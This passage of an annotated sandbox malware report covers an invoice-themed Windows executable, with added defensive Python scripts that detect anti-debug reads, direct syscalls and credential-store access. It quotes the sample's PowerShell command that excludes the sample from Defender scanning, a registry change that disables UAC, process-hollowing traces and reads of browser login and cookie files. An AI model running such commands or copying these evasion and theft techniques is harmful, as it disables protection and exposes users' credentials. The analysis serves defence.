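PEB_FIELDS = {0x02: "BeingDebugged", 0x0C: "Ldr", 0x18: "ProcessHeap", 0x68: "NtGlobalFlag"}


def classify_follow_up(buf, pos, reg):
    """If the instruction at pos is mov/movzx r, [reg+disp8], name the PEB field at disp8."""
    base = REG_NAMES.index(reg)
    if base == 4:                                   # [esp+disp8] needs a SIB byte; not handled here
        return None
    window = buf[pos:pos + 4]
    if len(window) >= 3 and window[0] in (0x8B, 0x8A):                   # mov r32/r8, [base+disp8]
        modrm, disp = window[1], window[2]
    elif len(window) >= 4 and window[0] == 0x0F and window[1] == 0xB6:   # movzx r32, byte [base+disp8]
        modrm, disp = window[2], window[3]
    else:
        return None
    if (modrm & 0xC0) != 0x40 or (modrm & 0x07) != base:  # need mod=01 and rm=the PEB base register
        return None
    return PEB_FIELDS.get(disp, "PEB+0x%02x" % disp)


def find_peb_reads(buf):
    """Return [{offset, reg, field}] for every mov r32, fs:[30h] found in buf."""
    hits = []
    i, n = 0, len(buf)
    while i < n:
        if buf[i] != 0x64:                          # FS segment-override prefix
            i += 1
            continue
        reg, length = None, 0
        if buf[i + 1:i + 2] == b"\xA1" and buf[i + 2:i + 6] == PEB_PTR_DISP:
            reg, length = "eax", 6                  # 64 A1 30 00 00 00      mov eax, fs:[30h]
        elif buf[i + 1:i + 2] == b"\x8B" and buf[i + 3:i + 7] == PEB_PTR_DISP:
            modrm = buf[i + 2]
            if (modrm & 0xC7) == 0x05:              # 64 8B /r 30 00 00 00   mod=00, rm=101 (disp32)
                reg, length = REG_NAMES[(modrm >> 3) & 7], 7
        if reg is None:
            i += 1
            continue
        hits.append({"offset": i, "reg": reg, "field": classify_follow_up(buf, i + length, reg)})
        i += length
    return hits


# Constructed sample: a typical anti-debug prologue, not bytes from the analysed file.
SAMPLE = bytes.fromhex(
    "90 90"
    "64 A1 30 00 00 00"        # mov eax, fs:[30h]
    "0F B6 40 02"              # movzx eax, byte ptr [eax+2]   -> PEB.BeingDebugged
    "85 C0 75 10"              # test eax, eax / jnz
    "64 8B 0D 30 00 00 00"     # mov ecx, fs:[30h]
    "8B 41 68"                 # mov eax, [ecx+68h]            -> PEB.NtGlobalFlag
    "64 8B 15 30 00 00 00"     # mov edx, fs:[30h]
    "8B 42 0C"                 # mov eax, [edx+0Ch]            -> PEB.Ldr
    "C3"
)

if __name__ == "__main__":
    for h in find_peb_reads(SAMPLE):
        print("0x%04x  mov %s, fs:[30h]  next read: %s" % (h["offset"], h["reg"], h["field"]))
```

            Run it over a dump and the offsets map straight onto the 4_2_xxxxxxxx function addresses in the rows above; an unlabelled follow-up (field None) usually means the PEB pointer was saved to a local first, which the one-instruction look-ahead deliberately does not chase.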

            HIPS / PFW / Operating System Protection Evasion

            Source: C:\Users\user\Desktop\dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exe" -Force
            Source: C:\Users\user\Desktop\dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exe" -Force
            Source: C:\Program Files (x86)\eHctiqUIHXMitvvYEbqHxdywRbuiEQngCgUQOsHexzsESgFy\rQkTBkrqhGpTBn.exe | NtWriteVirtualMemory: Direct from: 0x76F0490C
            Source: C:\Program Files (x86)\eHctiqUIHXMitvvYEbqHxdywRbuiEQngCgUQOsHexzsESgFy\rQkTBkrqhGpTBn.exe | NtAllocateVirtualMemory: Direct from: 0x76F03C9C
            Source: C:\Program Files (x86)\eHctiqUIHXMitvvYEbqHxdywRbuiEQngCgUQOsHexzsESgFy\rQkTBkrqhGpTBn.exe | NtClose: Direct from: 0x76F02B6C
            Source: C:\Program Files (x86)\eHctiqUIHXMitvvYEbqHxdywRbuiEQngCgUQOsHexzsESgFy\rQkTBkrqhGpTBn.exe | NtReadVirtualMemory: Direct from: 0x76F02E8C
            Source: C:\Program Files (x86)\eHctiqUIHXMitvvYEbqHxdywRbuiEQngCgUQOsHexzsESgFy\rQkTBkrqhGpTBn.exe | NtCreateKey: Direct from: 0x76F02C6C
            Source: C:\Program Files (x86)\eHctiqUIHXMitvvYEbqHxdywRbuiEQngCgUQOsHexzsESgFy\rQkTBkrqhGpTBn.exe | NtSetInformationThread: Direct from: 0x76F02B4C
            Source: C:\Program Files (x86)\eHctiqUIHXMitvvYEbqHxdywRbuiEQngCgUQOsHexzsESgFy\rQkTBkrqhGpTBn.exe | NtQueryAttributesFile: Direct from: 0x76F02E6C
            Source: C:\Program Files (x86)\eHctiqUIHXMitvvYEbqHxdywRbuiEQngCgUQOsHexzsESgFy\rQkTBkrqhGpTBn.exe | NtAllocateVirtualMemory: Direct from: 0x76F048EC
            Source: C:\Program Files (x86)\eHctiqUIHXMitvvYEbqHxdywRbuiEQngCgUQOsHexzsESgFy\rQkTBkrqhGpTBn.exe | NtQuerySystemInformation: Direct from: 0x76F048CC
            Source: C:\Program Files (x86)\eHctiqUIHXMitvvYEbqHxdywRbuiEQngCgUQOsHexzsESgFy\rQkTBkrqhGpTBn.exe | NtQueryVolumeInformationFile: Direct from: 0x76F02F2C
            Source: C:\Program Files (x86)\eHctiqUIHXMitvvYEbqHxdywRbuiEQngCgUQOsHexzsESgFy\rQkTBkrqhGpTBn.exe | NtOpenSection: Direct from: 0x76F02E0C
            Source: C:\Program Files (x86)\eHctiqUIHXMitvvYEbqHxdywRbuiEQngCgUQOsHexzsESgFy\rQkTBkrqhGpTBn.exe | NtSetInformationThread: Direct from: 0x76EF63F9
            Source: C:\Program Files (x86)\eHctiqUIHXMitvvYEbqHxdywRbuiEQngCgUQOsHexzsESgFy\rQkTBkrqhGpTBn.exe | NtDeviceIoControlFile: Direct from: 0x76F02AEC
            Source: C:\Program Files (x86)\eHctiqUIHXMitvvYEbqHxdywRbuiEQngCgUQOsHexzsESgFy\rQkTBkrqhGpTBn.exe | NtAllocateVirtualMemory: Direct from: 0x76F02BEC
            Source: C:\Program Files (x86)\eHctiqUIHXMitvvYEbqHxdywRbuiEQngCgUQOsHexzsESgFy\rQkTBkrqhGpTBn.exe | NtCreateFile: Direct from: 0x76F02FEC
            Source: C:\Program Files (x86)\eHctiqUIHXMitvvYEbqHxdywRbuiEQngCgUQOsHexzsESgFy\rQkTBkrqhGpTBn.exe | NtOpenFile: Direct from: 0x76F02DCC
            Source: C:\Program Files (x86)\eHctiqUIHXMitvvYEbqHxdywRbuiEQngCgUQOsHexzsESgFy\rQkTBkrqhGpTBn.exe | NtQueryInformationToken: Direct from: 0x76F02CAC
            Source: C:\Program Files (x86)\eHctiqUIHXMitvvYEbqHxdywRbuiEQngCgUQOsHexzsESgFy\rQkTBkrqhGpTBn.exe | NtTerminateThread: Direct from: 0x76F02FCC
            Source: C:\Program Files (x86)\eHctiqUIHXMitvvYEbqHxdywRbuiEQngCgUQOsHexzsESgFy\rQkTBkrqhGpTBn.exe | NtProtectVirtualMemory: Direct from: 0x76EF7B2E
            Source: C:\Program Files (x86)\eHctiqUIHXMitvvYEbqHxdywRbuiEQngCgUQOsHexzsESgFy\rQkTBkrqhGpTBn.exe | NtOpenKeyEx: Direct from: 0x76F02B9C
            Source: C:\Program Files (x86)\eHctiqUIHXMitvvYEbqHxdywRbuiEQngCgUQOsHexzsESgFy\rQkTBkrqhGpTBn.exe | NtProtectVirtualMemory: Direct from: 0x76F02F9C
            Source: C:\Program Files (x86)\eHctiqUIHXMitvvYEbqHxdywRbuiEQngCgUQOsHexzsESgFy\rQkTBkrqhGpTBn.exe | NtSetInformationProcess: Direct from: 0x76F02C5C
            Source: C:\Program Files (x86)\eHctiqUIHXMitvvYEbqHxdywRbuiEQngCgUQOsHexzsESgFy\rQkTBkrqhGpTBn.exe | NtNotifyChangeKey: Direct from: 0x76F03C2C
            Source: C:\Program Files (x86)\eHctiqUIHXMitvvYEbqHxdywRbuiEQngCgUQOsHexzsESgFy\rQkTBkrqhGpTBn.exe | NtCreateMutant: Direct from: 0x76F035CC
            Source: C:\Program Files (x86)\eHctiqUIHXMitvvYEbqHxdywRbuiEQngCgUQOsHexzsESgFy\rQkTBkrqhGpTBn.exe | NtWriteVirtualMemory: Direct from: 0x76F02E3C
            Source: C:\Program Files (x86)\eHctiqUIHXMitvvYEbqHxdywRbuiEQngCgUQOsHexzsESgFy\rQkTBkrqhGpTBn.exe | NtMapViewOfSection: Direct from: 0x76F02D1C
            Source: C:\Program Files (x86)\eHctiqUIHXMitvvYEbqHxdywRbuiEQngCgUQOsHexzsESgFy\rQkTBkrqhGpTBn.exe | NtResumeThread: Direct from: 0x76F036AC
            Source: C:\Program Files (x86)\eHctiqUIHXMitvvYEbqHxdywRbuiEQngCgUQOsHexzsESgFy\rQkTBkrqhGpTBn.exe | NtAllocateVirtualMemory: Direct from: 0x76F02BFC
            Source: C:\Program Files (x86)\eHctiqUIHXMitvvYEbqHxdywRbuiEQngCgUQOsHexzsESgFy\rQkTBkrqhGpTBn.exe | NtReadFile: Direct from: 0x76F02ADC
            Source: C:\Program Files (x86)\eHctiqUIHXMitvvYEbqHxdywRbuiEQngCgUQOsHexzsESgFy\rQkTBkrqhGpTBn.exe | NtQuerySystemInformation: Direct from: 0x76F02DFC
            Source: C:\Program Files (x86)\eHctiqUIHXMitvvYEbqHxdywRbuiEQngCgUQOsHexzsESgFy\rQkTBkrqhGpTBn.exe | NtDelayExecution: Direct from: 0x76F02DDC
            Source: C:\Program Files (x86)\eHctiqUIHXMitvvYEbqHxdywRbuiEQngCgUQOsHexzsESgFy\rQkTBkrqhGpTBn.exe | NtQueryInformationProcess: Direct from: 0x76F02C26
            Source: C:\Program Files (x86)\eHctiqUIHXMitvvYEbqHxdywRbuiEQngCgUQOsHexzsESgFy\rQkTBkrqhGpTBn.exe | NtResumeThread: Direct from: 0x76F02FBC
            Source: C:\Program Files (x86)\eHctiqUIHXMitvvYEbqHxdywRbuiEQngCgUQOsHexzsESgFy\rQkTBkrqhGpTBn.exe | NtCreateUserProcess: Direct from: 0x76F0371C
            Source: C:\Users\user\Desktop\dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exe | Memory written: C:\Windows\regedit.exe base: 400000 value starts with: 4D5A
            Source: C:\Users\user\Desktop\dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe base: 400000 value starts with: 4D5A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Section loaded: NULL target: C:\Program Files (x86)\eHctiqUIHXMitvvYEbqHxdywRbuiEQngCgUQOsHexzsESgFy\rQkTBkrqhGpTBn.exe protection: execute and read and write
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Section loaded: NULL target: C:\Windows\SysWOW64\wextract.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\wextract.exe | Section loaded: NULL target: C:\Program Files (x86)\eHctiqUIHXMitvvYEbqHxdywRbuiEQngCgUQOsHexzsESgFy\rQkTBkrqhGpTBn.exe protection: read write
            Source: C:\Windows\SysWOW64\wextract.exe | Section loaded: NULL target: C:\Program Files (x86)\eHctiqUIHXMitvvYEbqHxdywRbuiEQngCgUQOsHexzsESgFy\rQkTBkrqhGpTBn.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\wextract.exe | Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
            Source: C:\Windows\SysWOW64\wextract.exe | Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\wextract.exe | Thread register set: target process: 7688
            Source: C:\Windows\SysWOW64\wextract.exe | Thread APC queued: target process: C:\Program Files (x86)\eHctiqUIHXMitvvYEbqHxdywRbuiEQngCgUQOsHexzsESgFy\rQkTBkrqhGpTBn.exe
            Source: C:\Users\user\Desktop\dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exe | Memory written: C:\Windows\regedit.exe base: 400000
            Source: C:\Users\user\Desktop\dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exe | Memory written: C:\Windows\regedit.exe base: 401000
            Source: C:\Users\user\Desktop\dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe base: 400000
            Source: C:\Users\user\Desktop\dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe base: 401000
            Source: C:\Users\user\Desktop\dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe base: A40008
            Source: C:\Users\user\Desktop\dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exe" -Force
            Source: C:\Users\user\Desktop\dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exe | Process created: C:\Windows\regedit.exe "C:\Windows\regedit.exe"
            Source: C:\Users\user\Desktop\dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"
            Source: C:\Program Files (x86)\eHctiqUIHXMitvvYEbqHxdywRbuiEQngCgUQOsHexzsESgFy\rQkTBkrqhGpTBn.exe | Process created: C:\Windows\SysWOW64\wextract.exe "C:\Windows\SysWOW64\wextract.exe"
            Source: C:\Windows\SysWOW64\wextract.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: rQkTBkrqhGpTBn.exe, 0000000C.00000000.2001742701.0000000001091000.00000002.00000001.00040000.00000000.sdmp, rQkTBkrqhGpTBn.exe, 0000000C.00000002.4139977533.0000000001091000.00000002.00000001.00040000.00000000.sdmp, rQkTBkrqhGpTBn.exe, 0000000E.00000000.2141121954.00000000014F0000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Shell_TrayWnd
            Source: rQkTBkrqhGpTBn.exe, 0000000C.00000000.2001742701.0000000001091000.00000002.00000001.00040000.00000000.sdmp, rQkTBkrqhGpTBn.exe, 0000000C.00000002.4139977533.0000000001091000.00000002.00000001.00040000.00000000.sdmp, rQkTBkrqhGpTBn.exe, 0000000E.00000000.2141121954.00000000014F0000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progman
            Source: rQkTBkrqhGpTBn.exe, 0000000C.00000000.2001742701.0000000001091000.00000002.00000001.00040000.00000000.sdmp, rQkTBkrqhGpTBn.exe, 0000000C.00000002.4139977533.0000000001091000.00000002.00000001.00040000.00000000.sdmp, rQkTBkrqhGpTBn.exe, 0000000E.00000000.2141121954.00000000014F0000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progmanlock
            Source: rQkTBkrqhGpTBn.exe, 0000000C.00000000.2001742701.0000000001091000.00000002.00000001.00040000.00000000.sdmp, rQkTBkrqhGpTBn.exe, 0000000C.00000002.4139977533.0000000001091000.00000002.00000001.00040000.00000000.sdmp, rQkTBkrqhGpTBn.exe, 0000000E.00000000.2141121954.00000000014F0000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: }Program Manager
            Source: C:\Users\user\Desktop\dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exe | Queries volume information: C:\Users\user\Desktop\dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exe VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
            Source: C:\Users\user\Desktop\dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
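            The rQkTBkrqhGpTBn.exe rows above list Nt* calls together with the address the report attributes each one to ("Direct from"). That is the basis of the "Found direct / indirect Syscall (likely to bypass EDR)" signature: a system call that is not reached through ntdll's own export stub is either a hand-rolled direct syscall or a stub copied out of ntdll, and in both cases user-mode hooks placed on the ntdll exports never see it. The example below is added and is not the report's own logic. It takes rows in the report's format and a module map, and classifies every origin as inside ntdll or outside it. Both the module map (HYPOTHETICAL_MODULES: bases and sizes are invented) and the rows in SAMPLE_ROWS are constructed for the demonstration and say nothing about where this sample's addresses actually fall.

```python
"""Resolve the origin address of each recorded Nt* syscall against a process module map.
Added example; the module map and report rows below are constructed, not taken from the report."""
import re
from bisect import bisect_right

# One report row per syscall: "<process>NtXxx: Direct from: 0x...." (verb fused to the path as extracted).
ROW = re.compile(r"(?P<api>Nt[A-Za-z]+): Direct from: 0x(?P<addr>[0-9A-Fa-f]+)")

# Hypothetical 32-bit (WoW64) layout: (module, base, size). Real values come from the process's module list.
HYPOTHETICAL_MODULES = [
    ("ntdll.dll", 0x77000000, 0x1A0000),
    ("kernel32.dll", 0x76C00000, 0xF0000),
    ("sample.exe", 0x00400000, 0x60000),
]

# Constructed rows in the report's format (addresses do not correspond to the analysed sample).
SAMPLE_ROWS = """
C:\\Program Files (x86)\\x\\sample.exeNtAllocateVirtualMemory: Direct from: 0x77043C9C
C:\\Program Files (x86)\\x\\sample.exeNtWriteVirtualMemory: Direct from: 0x0267490C
C:\\Program Files (x86)\\x\\sample.exeNtProtectVirtualMemory: Direct from: 0x00417B2E
C:\\Program Files (x86)\\x\\sample.exeNtClose: Direct from: 0x77002B6C
"""


def build_module_map(modules):
    """Sort modules by base so that a bisect finds the candidate module for an address in O(log n)."""
    entries = sorted(modules, key=lambda m: m[1])
    return [base for _, base, _ in entries], entries


def module_for(addr, module_map):
    """Name of the module whose mapped range contains addr, or None for unbacked memory."""
    starts, entries = module_map
    i = bisect_right(starts, addr) - 1
    if i >= 0:
        name, base, size = entries[i]
        if base <= addr < base + size:
            return name
    return None


def classify_syscalls(report_text, module_map):
    """Group origins per API: issued from inside ntdll (the legitimate stub) or from elsewhere."""
    verdicts = {}
    for m in ROW.finditer(report_text):
        api, addr = m["api"], int(m["addr"], 16)
        mod = module_for(addr, module_map)
        entry = verdicts.setdefault(api, {"ntdll": [], "outside": []})
        if mod and mod.lower() == "ntdll.dll":
            entry["ntdll"].append(addr)
        else:
            entry["outside"].append((addr, mod))   # mod is None for unbacked (injected) memory
    return verdicts


def suspicious(verdicts):
    """APIs with at least one syscall issued outside ntdll: a direct syscall or a copied stub."""
    return sorted(api for api, v in verdicts.items() if v["outside"])


if __name__ == "__main__":
    mm = build_module_map(HYPOTHETICAL_MODULES)
    v = classify_syscalls(SAMPLE_ROWS, mm)
    for api in suspicious(v):
        for addr, mod in v[api]["outside"]:
            print("%-28s 0x%08X  origin: %s" % (api, addr, mod or "unbacked memory"))
```

            A production check takes the module list from the live process or the sandbox's module dump rather than a hypothetical table, and should also compare the bytes at an in-ntdll origin with the export's stub: an attacker who patches a stub in place, or jumps into the middle of ntdll's own syscall instruction, passes a pure range check.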

            Lowering of HIPS / PFW / Operating System Security Settings

            Source: C:\Users\user\Desktop\dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exe | Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System EnableLUA
            Source: Amcache.hve.7.dr | Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
            Source: Amcache.hve.7.dr | Binary or memory string: msmpeng.exe
            Source: Amcache.hve.7.dr | Binary or memory string: c:\program files\windows defender\msmpeng.exe
            Source: Amcache.hve.7.dr | Binary or memory string: MsMpEng.exe

            Stealing of Sensitive Information

            Source: Yara match | File source: 4.2.csc.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 4.2.csc.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 0000000D.00000002.4139355543.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 0000000D.00000002.4140304298.0000000000D20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000004.00000002.2074798692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 0000000E.00000002.4142164546.0000000005360000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 0000000D.00000002.4140267279.0000000000CD0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000004.00000002.2075004528.0000000005600000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 0000000C.00000002.4140287170.0000000002670000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000004.00000002.2075245562.0000000005A60000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: C:\Windows\SysWOW64\wextract.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
            Source: C:\Windows\SysWOW64\wextract.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
            Source: C:\Windows\SysWOW64\wextract.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
            Source: C:\Windows\SysWOW64\wextract.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
            Source: C:\Windows\SysWOW64\wextract.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
            Source: C:\Windows\SysWOW64\wextract.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
            Source: C:\Windows\SysWOW64\wextract.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
            Source: C:\Windows\SysWOW64\wextract.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
            Source: C:\Windows\SysWOW64\wextract.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
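            Four of the behaviours in this report are visible as simple combinations of rows: the PowerShell Add-MpPreference -ExclusionPath command line (Defender exclusion), the EnableLUA value under Policies\System (UAC disabled), a process the sample both created and then overwrote at base 400000 with data starting 4D5A, the MZ signature (the regedit.exe and csc.exe hollowing under "HIPS / PFW / Operating System Protection Evasion"), and wextract.exe opening the Chrome and Edge Login Data, Cookies, Web Data and Local State files and the Outlook profile key (credential theft). The triage script below is an added example, not part of the Joe Sandbox report: it parses rows in the report's extracted form (verb fused to the process path, optional "Jump to behavior" link label) and applies those four rules. SAMPLE_ROWS is constructed to mirror the report's format, with sample.exe standing in for the analysed file.

```python
"""Rule-based triage of Joe Sandbox style behaviour rows: Defender exclusion, UAC disabled via
EnableLUA, an MZ image written into a freshly created child (process hollowing) and reads of
browser / Outlook credential stores.
Added example; the rows are constructed to mirror the report's format, not copied from it."""
import re

# Rows read "Source: <process><Verb>: <detail>"; the verb is usually fused to the process path,
# so the source is matched non-greedily up to one of the verbs we care about. A trailing
# "Jump to behavior" link label, if present, is dropped.
ROW = re.compile(
    r"^Source:\s*(?P<src>.+?)\s*\|?\s*"
    r"(?P<verb>Process created|Memory written|Registry value created|File opened|Key opened)"
    r":\s*(?P<detail>.*?)(?:Jump to behavior)?\s*$"
)
MEM_WRITE = re.compile(r"(?P<target>.+?) base: (?P<base>[0-9A-Fa-f]+)(?: value starts with: (?P<magic>[0-9A-Fa-f]+))?$")
EXCLUSION = re.compile(r'Add-MpPreference\s+-ExclusionPath\s+"?(?P<path>[^"]+)"?', re.I)
UAC_OFF = re.compile(r"\\Policies\\System EnableLUA$", re.I)
CRED_STORES = (
    re.compile(r"\\(Login Data|Cookies|Web Data|Local State)$"),           # Chromium profile stores
    re.compile(r"Windows Messaging Subsystem\\Profiles\\Outlook", re.I),  # Outlook MAPI profiles
)

# Constructed rows mirroring the report's format (sample.exe stands in for the analysed file).
SAMPLE_ROWS = r"""
Source: C:\Users\user\Desktop\sample.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\sample.exe" -ForceJump to behavior
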